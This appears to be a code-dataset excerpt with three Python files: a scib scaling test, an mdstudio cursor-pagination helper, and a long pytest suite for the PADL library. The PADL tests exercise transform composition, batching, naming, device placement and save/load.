id
stringlengths
3
8
content
stringlengths
100
981k
438475
import scanpy as sc import numpy as np import scib def test_scale(): adata = sc.datasets.blobs() scib.pp.scale_batch(adata, 'blobs') split = scib.utils.split_batches(adata, 'blobs') for i in split: assert np.allclose(i.X.mean(0), np.zeros((0,adata.n_vars)))
438498
import json from typing import Tuple, List, Optional, Callable from copy import deepcopy from mdstudio.api.sort_mode import SortMode from mdstudio.collection import merge_dicts from mdstudio.deferred.chainable import chainable from mdstudio.deferred.return_value import return_value @chainable def paginate_cursor(filter, func, meta=None, paging=None, **kwargs): # type: (dict, Callable[dict, dict], Optional[Callable], Optional[dict], Optional[dict]) -> Tuple[List[dict], Optional[dict], Optional[dict]] allow_prev = True direction = SortMode.Desc if not meta: meta = { 'request': json.dumps(filter), 'limit': 50 } if 'limit' in paging: meta['limit'] = paging['limit'] allow_prev = False if paging or isinstance(paging, dict): meta['page'] = 1 if 'first' in meta: merge_dicts(filter, { '_id': { '$lt': meta['first'] } }) elif 'last' in meta: merge_dicts(filter, { '_id': { '$gt': meta['last'] } }) direction = SortMode.Asc # security fail over and add one extra to check if alive meta['limit'] = min(meta['limit'] + 1, 101) results = yield func(filter, **{ 'meta': meta, 'paging': paging, 'db': { 'limit': meta['limit'], 'sort': [('_id', direction)] }, 'kwargs': kwargs }) alive = len(results) == meta['limit'] meta['limit'] -= 1 results = results[:meta['limit'] if alive else len(results)] if 'first' in meta: results.reverse() next_meta = deepcopy(meta) prev_meta = deepcopy(meta) next_meta.pop('first', None) next_meta.pop('last', None) prev_meta.pop('first', None) prev_meta.pop('last', None) if alive or 'last' in meta: next_meta['last'] = results[len(results) - 1]['_id'] if 'page' in next_meta: next_meta['page'] = meta['page'] + 1 else: next_meta = None if allow_prev and (alive or 'first' in meta): prev_meta['first'] = results[0]['_id'] if 'page' in prev_meta: prev_meta['page'] = meta['page'] - 1 else: prev_meta = None return_value((results, prev_meta, next_meta))
438545
import os from collections import OrderedDict import pytest import torch from padl import transforms as pd, transform, Identity, batch, unbatch, group from padl.transforms import Batchify, Unbatchify, TorchModuleTransform, RequirementNotFound from padl.dumptools.serialize import value import padl from collections import namedtuple from padl.transforms import load GLOBAL_1 = 0 GLOBAL_1 = GLOBAL_1 + 5 class PrettyMock: @staticmethod def text(x): return x @transform def plus_global(x): return x + GLOBAL_1 @transform def plus_one(x): return x + 1 @transform def append_one(x): return x + "one" @transform def times_two(x): return x * 2 @transform def plus(x, y): return x + y @transform def get_info(x): return x['info'] @transform def complex_signature_func_1(a, b=10): return a+b @transform def complex_signature_func_2(*a, b=10): return sum(a) + b def simple_func(x): return x class SimpleClass: def __init__(self, a): self.a = a def __call__(self, x): return x + self.a @transform class SimpleClassTransform: def __init__(self, a): self.a = a def __call__(self, x): return x + self.a @transform class ClassTransformWithManyArguments: def __init__(self, a, b, *args, c=1, d=2, **kwargs): self.a = a def __call__(self, x): return x + self.a @transform def trans_with_globals(x, y): return (plus >> times_two)(x, y) @transform class ClassLookup: def __init__(self, dic): self.dic = dic def __call__(self, args): return [self.dic.get(x, len(self.dic)) for x in args] @transform class Polynomial(torch.nn.Module): def __init__(self, a, b, pd_save_options=None): super().__init__() self.a = torch.nn.Parameter(torch.tensor(float(a))) self.b = torch.nn.Parameter(torch.tensor(float(b))) if pd_save_options is not None: self.pd_save_options = pd_save_options def forward(self, x): return x**self.a + x**self.b class PolynomialClass(torch.nn.Module): def __init__(self, a, b): super().__init__() self.a = torch.nn.Parameter(torch.tensor(float(a))) self.b = torch.nn.Parameter(torch.tensor(float(b))) def forward(self, x): return x**self.a + x**self.b def test_isinstance_of_namedtuple(): tup = tuple([1, 2, 3]) namedtup_type = namedtuple('something', 'a b c') namedtup_ins = namedtup_type(*tup) assert pd._isinstance_of_namedtuple(namedtup_ins) assert not pd._isinstance_of_namedtuple(tup) assert not pd._isinstance_of_namedtuple(list(tup)) assert not pd._isinstance_of_namedtuple(1.) assert not pd._isinstance_of_namedtuple('something') class TestNamedTupleOutput: @pytest.fixture(autouse=True, scope='class') def init(self, request): request.cls.transform_1 = plus_one request.cls.transform_2 = request.cls.transform_1 >> (times_two + times_two) request.cls.transform_3 = request.cls.transform_2 >> (times_two / times_two) def test_call(self): assert not pd._isinstance_of_namedtuple(self.transform_1(1)) assert pd._isinstance_of_namedtuple(self.transform_2(1)) assert pd._isinstance_of_namedtuple(self.transform_3(1)) def test_infer_apply(self): assert not pd._isinstance_of_namedtuple(self.transform_1.infer_apply(1)) assert pd._isinstance_of_namedtuple(self.transform_2.infer_apply(1)) assert pd._isinstance_of_namedtuple(self.transform_3.infer_apply(1)) def test_eval_apply(self): assert not any(list(map(pd._isinstance_of_namedtuple, self.transform_1.eval_apply([1, 2, 3])))) assert all(list(map(pd._isinstance_of_namedtuple, self.transform_2.eval_apply([1, 2, 3])))) assert all(list(map(pd._isinstance_of_namedtuple, self.transform_3.eval_apply([1, 2, 3])))) def test_train_apply(self): assert not any(list(map(pd._isinstance_of_namedtuple, self.transform_1.train_apply([1, 2, 3])))) assert all(list(map(pd._isinstance_of_namedtuple, self.transform_2.train_apply([1, 2, 3])))) assert all(list(map(pd._isinstance_of_namedtuple, self.transform_3.train_apply([1, 2, 3])))) class TestPADLCallTransform: @pytest.fixture(autouse=True, scope='class') def init(self, request): request.cls.transform_1 = plus_one >> (times_two + times_two) request.cls.transform_2 = transform(simple_func) + transform(simple_func) \ + transform(simple_func) request.cls.transform_3 = plus_one + times_two >> plus request.cls.transform_4 = plus_one + times_two >> complex_signature_func_1 request.cls.transform_5 = plus_one >> complex_signature_func_1 request.cls.transform_6 = plus_one + times_two >> complex_signature_func_2 def test_infer_apply(self): assert self.transform_1.infer_apply(1) assert self.transform_2.infer_apply(10) assert self.transform_3.infer_apply(1.4) assert self.transform_4.infer_apply(201) assert self.transform_5.infer_apply(11.1) assert self.transform_6.infer_apply(19) def test_pprintt(self): self.transform_1._repr_pretty_(PrettyMock, False) self.transform_2._repr_pretty_(PrettyMock, False) self.transform_3._repr_pretty_(PrettyMock, False) self.transform_4._repr_pretty_(PrettyMock, False) self.transform_5._repr_pretty_(PrettyMock, False) self.transform_6._repr_pretty_(PrettyMock, False) def test_save_load(self, tmp_path, ignore_padl_requirement): for transform_ in [self.transform_1, self.transform_2, self.transform_3, self.transform_4, self.transform_5, self.transform_6]: transform_.pd_save(tmp_path / 'test.padl', True) t_ = pd.load(tmp_path / 'test.padl') assert t_.infer_apply(1) class TestMap: @pytest.fixture(autouse=True, scope='class') def init(self, request): request.cls.transform_1 = ~plus_one request.cls.transform_2 = transform(simple_func) / ~plus_one request.cls.transform_3 = ~times_two + ~plus_one request.cls.transform_4 = transform(lambda x: [x, x, x]) >> ~plus_one request.cls.transform_5 = Batchify() >> ~plus_one request.cls.transform_6 = ( Batchify() / Identity() >> ~plus_one ) request.cls.transform_7 = ( Batchify() / Identity() >> ~plus_one >> Unbatchify() / Identity() ) def test_pprintt(self): self.transform_1._repr_pretty_(PrettyMock, False) self.transform_2._repr_pretty_(PrettyMock, False) self.transform_3._repr_pretty_(PrettyMock, False) self.transform_4._repr_pretty_(PrettyMock, False) self.transform_5._repr_pretty_(PrettyMock, False) self.transform_6._repr_pretty_(PrettyMock, False) def test_pd_preprocess(self): assert isinstance(self.transform_1.pd_preprocess, pd.Identity) assert isinstance(self.transform_2.pd_preprocess, pd.Identity) assert isinstance(self.transform_5.pd_preprocess, pd.Batchify) assert isinstance(self.transform_6.pd_preprocess, pd.Compose) def test_pd_forward(self): assert isinstance(self.transform_1.pd_forward, pd.Map) assert isinstance(self.transform_2.pd_forward, pd.Parallel) assert isinstance(self.transform_5.pd_forward, pd.Map) assert isinstance(self.transform_6.pd_forward, pd.Parallel) def test_pd_postprocess(self): assert isinstance(self.transform_1.pd_postprocess, pd.Identity) assert isinstance(self.transform_2.pd_postprocess, pd.Identity) assert isinstance(self.transform_5.pd_postprocess, pd.Identity) assert isinstance(self.transform_6.pd_postprocess, pd.Identity) assert isinstance(self.transform_7.pd_postprocess, pd.Compose) def test_infer_apply(self): assert self.transform_1.infer_apply([2, 3, 4]) == (3, 4, 5) assert self.transform_2.infer_apply((1, [2, 3, 4])) == (1, (3, 4, 5)) assert self.transform_3.infer_apply([2, 3, 4]) == ((4, 6, 8), (3, 4, 5)) assert self.transform_4.infer_apply(1) == (2, 2, 2) assert self.transform_5.infer_apply([1, 1, 1]) == (2, 2, 2) assert self.transform_6.infer_apply([1, 2]) == (2, 3) def test_eval_apply(self): assert list(self.transform_1.eval_apply([[2, 3], [3, 4]])) == [(3, 4), (4, 5)] assert list(self.transform_2.eval_apply(([1, [2, 3]], (2, [3, 4])))) == [(1, (3, 4)), (2, (4, 5))] assert list(self.transform_3.eval_apply([[2, 3], [2, 3]])) == \ [((4, 6), (3, 4)), ((4, 6), (3, 4))] assert list(self.transform_4.eval_apply([1])) == [(2, 2, 2)] def test_train_apply(self): assert list(self.transform_1.train_apply([[2, 3], [3, 4]])) == [(3, 4), (4, 5)] assert list(self.transform_2.train_apply(([1, [2, 3]], (2, [3, 4])))) == [(1, (3, 4)), (2, (4, 5))] assert list(self.transform_3.eval_apply([[2, 3], [2, 3]])) == \ [((4, 6), (3, 4)), ((4, 6), (3, 4))] assert list(self.transform_4.train_apply([1])) == [(2, 2, 2)] def test_save_and_load(self, tmp_path, ignore_padl_requirement): self.transform_1.pd_save(tmp_path / 'test.padl') t1 = pd.load(tmp_path / 'test.padl') assert t1.infer_apply([2, 3, 4]) == (3, 4, 5) self.transform_2.pd_save(tmp_path / 'test.padl', True) t2 = pd.load(tmp_path / 'test.padl') assert t2.infer_apply((1, [2, 3, 4])) == (1, (3, 4, 5)) self.transform_3.pd_save(tmp_path / 'test.padl', True) t3 = pd.load(tmp_path / 'test.padl') assert t3.infer_apply([2, 3, 4]) == ((4, 6, 8), (3, 4, 5)) self.transform_4.pd_save(tmp_path / 'test.padl', True) t4 = pd.load(tmp_path / 'test.padl') assert t4.infer_apply(1) == (2, 2, 2) class TestParallel: @pytest.fixture(autouse=True, scope='class') def init(self, request): request.cls.transform_1 = plus_one / times_two / times_two request.cls.transform_2 = transform(simple_func) / transform(simple_func) / transform(simple_func) request.cls.transform_3 = plus_one / plus_one / transform(simple_func) request.cls.transform_4 = ( plus_one / plus_one >> transform(lambda x: x[0] * x[1]) ) def test_pprintt(self): self.transform_1._repr_pretty_(PrettyMock, False) self.transform_2._repr_pretty_(PrettyMock, False) self.transform_3._repr_pretty_(PrettyMock, False) self.transform_4._repr_pretty_(PrettyMock, False) def test_output(self): in_ = (2, 2, 2) out = self.transform_1(in_) assert pd._isinstance_of_namedtuple(out) assert out._fields == ('plus_one', 'times_two_0', 'times_two_1') out = self.transform_2(in_) assert pd._isinstance_of_namedtuple(out) assert out._fields == ('out_0', 'out_1', 'out_2') out = self.transform_3(in_) assert pd._isinstance_of_namedtuple(out) assert out._fields == ('plus_one_0', 'plus_one_1', 'out_2') def test_pd_preprocess(self): assert isinstance(self.transform_1.pd_preprocess, pd.Identity) assert isinstance(self.transform_4.pd_preprocess, pd.Identity) def test_pd_forward(self): assert isinstance(self.transform_1.pd_forward, pd.Parallel) assert isinstance(self.transform_4.pd_forward, pd.Compose) def test_pd_postprocess(self): assert isinstance(self.transform_1.pd_postprocess, pd.Identity) assert isinstance(self.transform_4.pd_postprocess, pd.Identity) def test_infer_apply(self): assert self.transform_1.infer_apply((2, 3, 4)) == (3, 6, 8) assert self.transform_4.infer_apply((2, 4)) == 15 def test_eval_apply(self): assert list(self.transform_1.eval_apply([(2, 3, 4), (3, 3, 4)])) == [(3, 6, 8), (4, 6, 8)] def test_save_and_load(self, tmp_path, ignore_padl_requirement): self.transform_1.pd_save(tmp_path / 'test.padl') t1 = pd.load(tmp_path / 'test.padl') assert t1.infer_apply((2, 3, 4)) == (3, 6, 8) self.transform_2.pd_save(tmp_path / 'test.padl', True) _ = pd.load(tmp_path / 'test.padl') self.transform_3.pd_save(tmp_path / 'test.padl', True) _ = pd.load(tmp_path / 'test.padl') class TestRollout: @pytest.fixture(autouse=True, scope='class') def init(self, request): request.cls.transform_1 = plus_one + times_two + times_two request.cls.transform_2 = transform(simple_func) + transform(simple_func) + transform(simple_func) request.cls.transform_3 = plus_one + plus_one + transform(simple_func) request.cls.transform_4 = ( (Batchify() >> plus_one) + (times_two >> Batchify()) ) request.cls.transform_5 = ( (times_two >> Batchify()) + (Batchify() >> plus_one) ) request.cls.transform_6 = ( plus_one / times_two >> times_two + times_two ) def test_pprintt(self): self.transform_1._repr_pretty_(PrettyMock, False) self.transform_2._repr_pretty_(PrettyMock, False) self.transform_3._repr_pretty_(PrettyMock, False) self.transform_4._repr_pretty_(PrettyMock, False) self.transform_5._repr_pretty_(PrettyMock, False) self.transform_6._repr_pretty_(PrettyMock, False) def test_identity_split(self): new_iden = Identity() - 'new_name' test = ( plus_one >> batch >> new_iden + new_iden >> plus >> unbatch >> new_iden + new_iden >> plus ) assert str(test.pd_forward) == str(new_iden + new_iden >> plus) def test_output(self): in_ = 123 out = self.transform_1(in_) assert pd._isinstance_of_namedtuple(out) assert out._fields == ('plus_one', 'times_two_0', 'times_two_1') out = self.transform_2(in_) assert pd._isinstance_of_namedtuple(out) assert out._fields == ('out_0', 'out_1', 'out_2') out = self.transform_3(in_) assert pd._isinstance_of_namedtuple(out) assert out._fields == ('plus_one_0', 'plus_one_1', 'out_2') def test_pd_preprocess(self): assert isinstance(self.transform_1.pd_preprocess, pd.Identity) assert isinstance(self.transform_6.pd_preprocess, pd.Identity) def test_pd_forward(self): assert isinstance(self.transform_1.pd_forward, pd.Rollout) assert isinstance(self.transform_6.pd_forward, pd.Compose) def test_pd_postprocess(self): assert isinstance(self.transform_1.pd_postprocess, pd.Identity) assert isinstance(self.transform_6.pd_postprocess, pd.Identity) def test_infer_apply(self): assert self.transform_1.infer_apply(2) == (3, 4, 4) assert self.transform_4.infer_apply(2) == (3, 4) assert self.transform_5.infer_apply(2) == (4, 3) assert self.transform_6.infer_apply((2, 2)) == ((3, 4, 3, 4), (3, 4, 3, 4)) def test_eval_apply(self): assert list(self.transform_1.eval_apply([2, 3])) == [(3, 4, 4), (4, 6, 6)] def test_save_and_load(self, tmp_path, ignore_padl_requirement): self.transform_1.pd_save(tmp_path / 'test.padl') t1 = pd.load(tmp_path / 'test.padl') assert t1.infer_apply(2) == (3, 4, 4) self.transform_2.pd_save(tmp_path / 'test.padl', True) _ = pd.load(tmp_path / 'test.padl') self.transform_3.pd_save(tmp_path / 'test.padl', True) _ = pd.load(tmp_path / 'test.padl') class TestCompose: @pytest.fixture(autouse=True, scope='class') def init(self, request): request.cls.transform_1 = (plus_one >> times_two) >> times_two request.cls.transform_2 = plus_one >> (times_two >> times_two) request.cls.transform_3 = plus_one >> times_two >> times_two request.cls.transform_4 = plus_one >> plus_one >> plus_one request.cls.transform_5 = ( plus_one >> Batchify() >> times_two - 'named_times_two' >> times_two >> Unbatchify() ) request.cls.transform_6 = ( times_two >> plus_one + plus_one ) request.cls.transform_7 = ( times_two >> plus_one + plus_one >> Identity() / Unbatchify() ) request.cls.transform_8 = ( times_two >> Unbatchify() ) request.cls.transform_9 = ( times_two >> Batchify() >> Unbatchify() ) request.cls.transform_10 = ( times_two >> Batchify() >> Unbatchify() >> Unbatchify() ) def test_unbatchify_position(self): assert self.transform_7.infer_apply(1) == (3, 3) assert self.transform_8.infer_apply(1) == 2 assert self.transform_9.infer_apply(1) == 2 with pytest.raises(AssertionError): self.transform_10.infer_apply(1) def test_pprintt(self): self.transform_1._repr_pretty_(PrettyMock, False) self.transform_2._repr_pretty_(PrettyMock, False) self.transform_3._repr_pretty_(PrettyMock, False) self.transform_4._repr_pretty_(PrettyMock, False) self.transform_5._repr_pretty_(PrettyMock, False) def test_associative(self): in_ = 123 assert self.transform_1(in_) == self.transform_2(in_) == self.transform_3(in_) def test_output(self): assert self.transform_4(1) == 4 def test_pd_preprocess(self): assert isinstance(self.transform_1.pd_preprocess, pd.Identity) assert isinstance(self.transform_5.pd_preprocess, pd.Compose) def test_pd_forward(self): assert isinstance(self.transform_1.pd_forward, pd.Compose) assert isinstance(self.transform_5.pd_forward, pd.Compose) def test_pd_postprocess(self): assert isinstance(self.transform_1.pd_postprocess, pd.Identity) assert isinstance(self.transform_5.pd_postprocess, pd.Unbatchify) def test_infer_apply(self): assert self.transform_4.infer_apply(1) == 4 assert self.transform_5.infer_apply(1) == torch.tensor(8) def test_eval_apply(self): assert list(self.transform_5.eval_apply([1, 1])) == [torch.tensor(8), torch.tensor(8)] def test_train_apply(self): # default assert list(self.transform_5.train_apply([1, 1])) == [torch.tensor(8), torch.tensor(8)] # loader kwargs for out in list(self.transform_5.train_apply( [1, 1, 1, 1], batch_size=2) ): assert out == torch.tensor(8) assert list(self.transform_5.train_apply( [1, 2, 1, 2], flatten=True, batch_size=2) ) == [torch.tensor(8), torch.tensor(12), torch.tensor(8), torch.tensor(12)] def test_all_transforms_1(self): c = plus_one >> times_two >> times_two all_ = c._pd_all_transforms() assert set(all_) == set([plus_one, times_two, c]) def test_all_transforms_2(self): c = plus_one >> times_two >> trans_with_globals all_ = c._pd_all_transforms() assert set(all_) == set([plus_one, times_two, c, trans_with_globals, plus]) def test_save_and_load(self, tmp_path, ignore_padl_requirement): self.transform_1.pd_save(tmp_path / 'test.padl') _ = pd.load(tmp_path / 'test.padl') self.transform_2.pd_save(tmp_path / 'test.padl', True) _ = pd.load(tmp_path / 'test.padl') self.transform_3.pd_save(tmp_path / 'test.padl', True) _ = pd.load(tmp_path / 'test.padl') self.transform_4.pd_save(tmp_path / 'test.padl', True) t4 = pd.load(tmp_path / 'test.padl') assert t4.infer_apply(1) == 4 self.transform_5.pd_save(tmp_path / 'test.padl', True) t5 = pd.load(tmp_path / 'test.padl') assert t5.infer_apply(1) == torch.tensor(8) def test_getitem(self): assert isinstance(self.transform_5[0], pd.Transform) assert isinstance(self.transform_5[0:2], pd.Pipeline) assert isinstance(self.transform_5[0:2], pd.Compose) assert isinstance(self.transform_5['named_times_two'], pd.Transform) with pytest.raises(ValueError): self.transform_5['other_name'] with pytest.raises(TypeError): self.transform_5[2.1] assert isinstance(self.transform_6['plus_one'], pd.Transform) class TestModel: @pytest.fixture(autouse=True, scope='class') def init(self, request): transform_1 = ( plus_one >> Batchify() >> times_two >> Unbatchify() >> plus_one ) transform_2 = ( plus_one >> Batchify() >> times_two >> Unbatchify() >> plus_one ) - 'transform_2' request.cls.model_1 = (transform_1 / transform_2) request.cls.model_2 = (transform_1 + transform_2) request.cls.model_3 = ( plus_one + times_two >> plus_one / Batchify() >> Batchify() / times_two ) request.cls.model_4 = ( plus_one + times_two >> Batchify() >> Polynomial(1, 0) / Identity() >> Unbatchify() >> plus_one / times_two ) - 'model_4' request.cls.model_5 = ~transform_1 request.cls.model_6 = ( Batchify() >> plus_one >> plus_one + times_two ) request.cls.model_7 = ( plus_one + times_two >> plus_one / Batchify() >> plus_one / plus_one >> Batchify() / times_two >> Unbatchify() >> plus_one / plus_one ) @pytest.fixture(scope='class') def to_tensor(self): return transform(lambda x: torch.tensor(x)) @pytest.fixture(scope='class') def lin(self): return transform(torch.nn.Linear(2, 2)) @pytest.fixture(scope='class') def post(self): return transform(lambda x: x.sum(-1).topk(1, -1).indices.item()) def test_pprintt(self): self.model_1._repr_pretty_(PrettyMock, False) self.model_2._repr_pretty_(PrettyMock, False) self.model_3._repr_pretty_(PrettyMock, False) self.model_4._repr_pretty_(PrettyMock, False) self.model_5._repr_pretty_(PrettyMock, False) self.model_6._repr_pretty_(PrettyMock, False) def test_pd_preprocess(self): assert isinstance(self.model_1.pd_preprocess, pd.Parallel) assert isinstance(self.model_2.pd_preprocess, pd.Rollout) assert isinstance(self.model_4.pd_preprocess, pd.Compose) assert isinstance(self.model_5.pd_preprocess, pd.Map) assert isinstance(self.model_6.pd_preprocess, pd.Batchify) assert isinstance(self.model_7.pd_preprocess, pd.Compose) def test_pd_forward(self): assert isinstance(self.model_1.pd_forward, pd.Parallel) assert isinstance(self.model_2.pd_forward, pd.Parallel) assert isinstance(self.model_5.pd_forward, pd.Map) assert isinstance(self.model_6.pd_forward, pd.Compose) assert isinstance(self.model_7.pd_forward, pd.Compose) def test_pd_postprocess(self): assert isinstance(self.model_1.pd_postprocess, pd.Parallel) assert isinstance(self.model_2.pd_postprocess, pd.Parallel) assert isinstance(self.model_4.pd_postprocess, pd.Compose) assert isinstance(self.model_5.pd_postprocess, pd.Map) assert isinstance(self.model_6.pd_postprocess, pd.Identity) assert isinstance(self.model_7.pd_postprocess, pd.Compose) def test_infer_apply(self): assert self.model_1.infer_apply((5, 5)) == (13, 13) assert self.model_2.infer_apply(torch.tensor(5)) == (13, 13) assert self.model_3.infer_apply(5) == (7, 20) assert self.model_4.infer_apply(5) == (8, 20) assert self.model_5.infer_apply((5, 5)) == (13, 13) assert self.model_6.infer_apply(5) == (7, 12) assert self.model_7.infer_apply(5) == (9, 23) def test_eval_apply(self): assert list(self.model_1.eval_apply([(5, 5), (5, 5)])) == [(13, 13), (13, 13)] assert list(self.model_2.eval_apply(torch.tensor([5, 5]))) == [(13, 13), (13, 13)] assert list(self.model_3.eval_apply([5, 6])) == [(7, 20), (8, 24)] assert list(self.model_4.eval_apply([5, 6])) == [(8, 20), (9, 24)] assert list(self.model_5.eval_apply([(5, 5), (5, 5)])) == [(13, 13), (13, 13)] assert list(self.model_6.eval_apply([5, 6])) == [(7, 12), (8, 14)] assert list(self.model_7.eval_apply([5, 6])) == [(9, 23), (10, 27)] def test_train_apply(self): assert list(self.model_1.train_apply([(5, 5), (5, 5)])) == [(13, 13), (13, 13)] assert list(self.model_2.train_apply(torch.tensor([5, 5]))) == [(13, 13), (13, 13)] assert list(self.model_3.train_apply([5, 6])) == [(7, 20), (8, 24)] assert list(self.model_4.train_apply([5, 6])) == [(8, 20), (9, 24)] assert list(self.model_5.train_apply([(5, 5), (5, 5)])) == [(13, 13), (13, 13)] def test_save_and_load(self, tmp_path, ignore_padl_requirement): pd.save(self.model_1, tmp_path / 'test.padl', compress=True, force_overwrite=True) m1 = pd.load(tmp_path / 'test.padl') assert m1.infer_apply((5, 5)) == (13, 13) pd.save(self.model_2, tmp_path / 'test.padl', compress=True, force_overwrite=True) m2 = pd.load(tmp_path / 'test.padl') assert m2.infer_apply(5) == (13, 13) pd.save(self.model_3, tmp_path / 'test1.padl', force_overwrite=True) m3 = pd.load(tmp_path / 'test1.padl') assert m3.infer_apply(5) == (7, 20) self.model_4.pd_save(tmp_path / 'test1.padl', force_overwrite=True) m4 = pd.load(tmp_path / 'test1.padl') assert m4.infer_apply(5) == (8, 20) self.model_5.pd_save(tmp_path / 'test1.padl', force_overwrite=True) m5 = pd.load(tmp_path / 'test1.padl') assert m5.infer_apply((5, 5)) == (13, 13) def test_pd_splits_compose(self, to_tensor, lin, post): t = (to_tensor >> batch >> (lin >> lin) + (lin >> lin) + (lin >> lin) >> (unbatch >> post) / (unbatch >> post) / (unbatch >> post) ) t_preprocess = to_tensor >> batch t_forward = group((lin >> lin) + (lin >> lin) + (lin >> lin)) t_postprocess = group((unbatch >> post) / (unbatch >> post) / (unbatch >> post)) assert str(t.pd_preprocess) == str(t_preprocess) assert str(t.pd_forward) == str(t_forward) assert str(t.pd_postprocess) == str(t_postprocess) def test_pd_splits_compose_with_group(self, to_tensor, lin, post): t = (to_tensor >> batch >> group((lin >> lin) + (lin >> lin)) + (lin >> lin) >> group((unbatch >> post) / (unbatch >> post)) / (unbatch >> post) ) t_preprocess = to_tensor >> batch t_forward = group(group((lin >> lin) + (lin >> lin)) + (lin >> lin)) t_postprocess = group(group((unbatch >> post) / (unbatch >> post)) / (unbatch >> post)) assert str(t.pd_preprocess) == str(t_preprocess) assert str(t.pd_forward) == str(t_forward) assert str(t.pd_postprocess) == str(t_postprocess) def test_pd_splits_parallel(self, to_tensor, lin): t = (((to_tensor >> batch >> lin) + (to_tensor >> batch >> lin)) / ((to_tensor >> batch) + (to_tensor >> batch)) ) - 'name' g = t / Identity() t_preprocess = group(group((to_tensor >> batch) + (to_tensor >> batch)) / group((to_tensor >> batch) + (to_tensor >> batch))) g_preprocess = group((t_preprocess - 'name') / Identity()) t_forward = group(group(lin / lin) / Identity()) g_forward = group((t_forward - 'name') / Identity()) assert str(t.pd_preprocess) == str(t_preprocess) assert str(g.pd_preprocess) == str(g_preprocess) assert str(t.pd_forward) == str(t_forward) assert str(g.pd_forward) == str(g_forward) def test_pd_splits_rollout(self, to_tensor, lin): t = ((to_tensor >> batch >> lin) / (to_tensor >> batch >> lin) + (to_tensor >> batch) / (to_tensor >> batch) ) - 'name' g = t + Identity() t_preprocess = group(group(to_tensor / to_tensor) + group(to_tensor / to_tensor)) - 'name' g_preprocess = group(t_preprocess + Identity()) t_forward = group(group(lin / lin) / Identity()) - 'name' g_forward = group(t_forward / Identity()) assert str(t.pd_preprocess) == str(t_preprocess) assert str(g.pd_preprocess) == str(g_preprocess) assert str(t.pd_forward) == str(t_forward) assert str(g.pd_forward) == str(g_forward) class TestFunctionTransform: @pytest.fixture(autouse=True, scope='class') def init(self, request): request.cls.transform_1 = plus_one request.cls.transform_2 = get_info request.cls.transform_3 = plus_global def test_pd_preprocess(self): assert isinstance(self.transform_1.pd_preprocess, pd.Identity) def test_pd_forward(self): assert isinstance(self.transform_1.pd_forward, pd.FunctionTransform) def test_pd_postprocess(self): assert isinstance(self.transform_1.pd_postprocess, pd.Identity) def test_infer_apply(self): assert self.transform_1.infer_apply(5) == 6 assert self.transform_3.infer_apply(5) == 10 def test_eval_apply(self): out = list(self.transform_1.eval_apply([5, 6])) assert len(out) == 2 assert out[0] == 6 assert out[1] == 7 out = list(self.transform_2.eval_apply([{'info': 'hello'}, {'info': 'dog'}])) assert len(out) == 2 assert out[0] == 'hello' assert out[1] == 'dog' def test_all_transforms(self): all_ = trans_with_globals._pd_all_transforms() assert set(all_) == set([plus, times_two, trans_with_globals]) def test_pd_to(self): self.transform_1.pd_to('cpu') assert self.transform_1.pd_device == 'cpu' def test_save_and_load(self, tmp_path, ignore_padl_requirement): self.transform_1.pd_save(tmp_path / 'test.padl', True) t1 = pd.load(tmp_path / 'test.padl') assert t1.infer_apply(5) == 6 self.transform_2.pd_save(tmp_path / 'test.padl', True) _ = pd.load(tmp_path / 'test.padl') self.transform_3.pd_save(tmp_path / 'test.padl', True) t3 = pd.load(tmp_path / 'test.padl') assert t3.infer_apply(5) == 10 def test_name(): assert (plus_one - 'p1')._pd_name == 'p1' assert plus_one._pd_name is None class TestTransformDeviceCheck: @pytest.fixture(autouse=True, scope='class') def init(self, request): request.cls.transform_1 = Batchify() >> (plus_one >> times_two) >> times_two request.cls.transform_2 = Batchify() >> plus_one >> (times_two >> times_two) def test_device_check(self): self.transform_1.pd_to('gpu') self.transform_1.transforms[1].pd_to('cpu') assert self.transform_1.pd_forward_device_check() self.transform_2.pd_to('gpu') assert self.transform_2.pd_forward_device_check() class TestClassTransform: @pytest.fixture(autouse=True, scope='class') def init(self, request): request.cls.transform_1 = transform(SimpleClass)(2) request.cls.transform_2 = SimpleClassTransform(2) dic = {s: i for i, s in enumerate('abcdefghijklmnop')} request.cls.transform_3 = ClassLookup(dic=value(dic)) request.cls.dic = dic def test_infer_apply(self): assert self.transform_1.infer_apply(1) == 3 assert self.transform_2.infer_apply(1) == 3 assert self.transform_3.infer_apply('abc') == [0, 1, 2] def test_save_and_load(self, tmp_path, ignore_padl_requirement): self.transform_1.pd_save(tmp_path / 'test') t1 = pd.load(tmp_path / 'test.padl') assert t1.infer_apply(1) == 3 self.transform_2.pd_save(tmp_path / 'test.padl', True) t2 = pd.load(tmp_path / 'test.padl') assert t2.infer_apply(1) == 3 self.transform_3.pd_save(tmp_path / 'test.padl', True) t3 = pd.load(tmp_path / 'test.padl') assert t3.dic == self.dic assert t3.infer_apply('abc') == [0, 1, 2] def test_stored_arguments(self): c = ClassTransformWithManyArguments(1, 2, 3, 4, 5) assert c._pd_arguments == OrderedDict([('a', 1), ('b', 2), ('args', (3, 4, 5))]) class TestTorchModuleTransform: @pytest.fixture(autouse=True, scope='class') def init(self, request): request.cls.transform_1 = Polynomial(2, 3) request.cls.transform_2 = \ Polynomial(2, 3, pd_save_options={'torch.nn.Module': 'no-save'}) def test_output(self): output = self.transform_1(1) assert output == 2 def test_infer_apply(self): assert self.transform_1.infer_apply(1) def test_device(self): self.transform_1.pd_to('cpu') device = next(self.transform_1.pd_layers[0].parameters()).device.type assert device == 'cpu' def test_pd_layers(self): assert len(self.transform_1.pd_layers) > 0 def test_pd_parameters(self): params = list(self.transform_1.pd_parameters()) assert len(params) == 2 def test_save_and_load(self, tmp_path, ignore_padl_requirement): self.transform_1.pd_save(tmp_path / 'test.padl') t1 = pd.load(tmp_path / 'test.padl') assert t1.infer_apply(1) == 2 def test_pd_save_with_options(self, tmp_path, capsys, ignore_padl_requirement): self.transform_2.pd_save(tmp_path / 'test.padl') print(tmp_path / 'test.padl') assert not os.path.exists((tmp_path / 'test.padl') / '0.pt') pd.load(tmp_path / 'test.padl') out, err = capsys.readouterr() assert 'loading torch module from' not in out class TestTorchModuleTransformWithJit: @pytest.fixture(autouse=True, scope='class') def init(self, request): # transform wrapped around torch.jit.script request.cls.jit_1 = transform(torch.jit.script(PolynomialClass(2, 3))) request.cls.compose_1 = transform(lambda x: x + 1) >> batch >> self.jit_1 def test_type(self): assert isinstance(self.jit_1, pd.Transform) assert isinstance(self.compose_1, pd.Transform) def test_output(self): assert self.jit_1(torch.tensor(1)) == torch.tensor(2) def test_infer_apply(self): assert self.jit_1.infer_apply(torch.tensor(1)) == torch.tensor(2) assert self.compose_1.infer_apply(torch.tensor(0)) == torch.tensor(2) 